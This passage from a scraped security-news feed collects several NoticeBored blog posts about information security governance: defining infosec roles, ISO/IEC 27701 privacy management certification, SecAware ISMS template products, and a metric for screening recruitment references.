a useful prompt to confirm that they have all the bases covered. A micro-company will not need to perform every listed activity, and will have no choice but to concentrate on the few that matter most. Either way, the process of management deciding what the necessary activities should involve and, where appropriate, assigning responsibilities to the relevant workers, corporate functions or third parties, is much the same and hence worth laying out in a generic procedure.As I'm drafting the procedure, I'm itching to mention related aspects such as governance, accountability, access cont]]> 2020-08-07T16:05:08+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/68oSUyc-MLQ/nblog-july-23-infosec-roles.html www.secnews.physaphae.fr/article.php?IdArticle=2148842 False None None None NoticeBored - Experienced IT Security professional Within a year or so, organisations will be able to have their Privacy Information Management Systems certified compliant with ISO/IEC 27701, thanks to a new accreditation standard ISO/IEC TS 27006 part 2, currently in draft.A PIMS is very similar to an Information Security Management System, hence compliance auditing and certification are also very similar – so much so that I've heard some certification bodies are already taking the initiative by issuing PIMS certificates despite their not being formally accredited for that.Potentially, a PIMS certificate may become the generally-accepted means of demonstrating an organisation's due care over privacy and personal data protection – a way to assure data subjects, business partners, the authorities and courts that they have, in fact, adopted good privacy practices.  A PIMS should materially reduce an organisation's risk of suffering privacy breaches.   However, as with an ISMS, 'materially reduce' is not quite the same as 'eliminate'.  In the less likely event that a privacy breach occurs, despite having a PIMS, compliance certificates for the organisation and if appropriate its information service suppliers (e.g. cloud or marketing services) may be a credible part of the organisation's legal defence against prosecution under GDPR or other privacy laws and regs, but they would still need to explain why the breach occurred and what they have fixed to prevent a recurrence.  The PIMS should at least structure the response to the breach, including corrective actions addressing the root causes, hence there should be something substantial behind the usual vacuous PR statements about 'taking this matter very seriously'.]]> 2020-07-31T08:58:07+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/Z1_bB-FdNjM/nblog-july-31-whos-for-pimms.html www.secnews.physaphae.fr/article.php?IdArticle=2148839 False None None None NoticeBored - Experienced IT Security professional SecAware ISMS Launchpad comprises a set of templates for the mandatory documentation that every compliant Information Security Management System must have: a basic ISMS strategy, scope, Statement of Applicability, Risk Treatment Plan, information security policy, that sort of thing. If your organisations only needs an ISO/IEC 27001 certificate, this tidy stack of templates forms a stable, compliant platform from which to launch your ISMS. For a paltry $99, download Launchpad and get started today!Hot on its tail, today we announce the next phase of our mission to convince every organisation to manage its information risks properly.If your organisation sees the value in going a little beyond the bare minimum, SecAware ISMS Take-off takes you to the next stage. Take-off provides all of these:The Take-off materials primarily concern management. An ISO27k ISMS is, after all, a management system.Template #2 "Strategic objectives for information risk and security management" for instance specifies:"Enhance and protect the value of information by ensuring adequate confidentiality, integrity and availability""Manage (i.e. identify, evaluate, treat and monitor) information risks cost-effectively and competently" ... plus four other key objectives. It also lays out four n]]> 2020-07-29T14:10:44+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/Ubbg_QqiMw0/nblog-july-29-boost-your-iso27k-isms.html www.secnews.physaphae.fr/article.php?IdArticle=2148840 False None None None NoticeBored - Experienced IT Security professional We were chatting over coffee this morning about an organisation that is recruiting at the moment. Having been through the cycle of advertising, preselecting/long-listing, interviewing and short-listing candidates, their references came back negative, forcing the organisation to reboot the recruitment process.On the one hand, that's a disappointing and somewhat costly outcome. It suggests, perhaps, that the preselection and interviewing steps could be tightened up. Were there warning signs - yellow or red flags that could/should have been spotted earlier in the process?On the other, it also indicates that the selection/recruitment process is effectively identifying and weeding-out unsuitable applicants, avoiding what could have turned out to be even costlier incidents down the line if the appointments had been made and the new recruits had turned out to be unsuitable.So, Proportion of shortlisted candidates rejected as a result of poor references is one of several possible measures of the recruitment process, with implications for risks and opportunities, costs and benefits. Very high or low values of the metric, or adverse trends, or sudden changes, may all be cause for concern and worthy of investigation, whereas middling, "neutral" values are to be expected.The metric probably wouldn't have even occurred to me except that I happen to be documenting information security controls for joiners, movers and leavers at the moment for the next phase of SecAware ISMS templates. Information risks should be taken into account during the recruitment process. Confirming applicants' identities, taking up references, confirming employment histories and qualifications on their CVs, and running other background checks (e.g. for criminal records or credit issues) can be important controls if legally permissible, especially for appointments trusted roles - and, by the way, that includes internal transfers and promotions as well as new recruits.  ]]> 2020-07-28T13:38:59+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/H03yFlnmtl8/nblog-july-28-interesting-risk-metric.html www.secnews.physaphae.fr/article.php?IdArticle=2148841 False None None None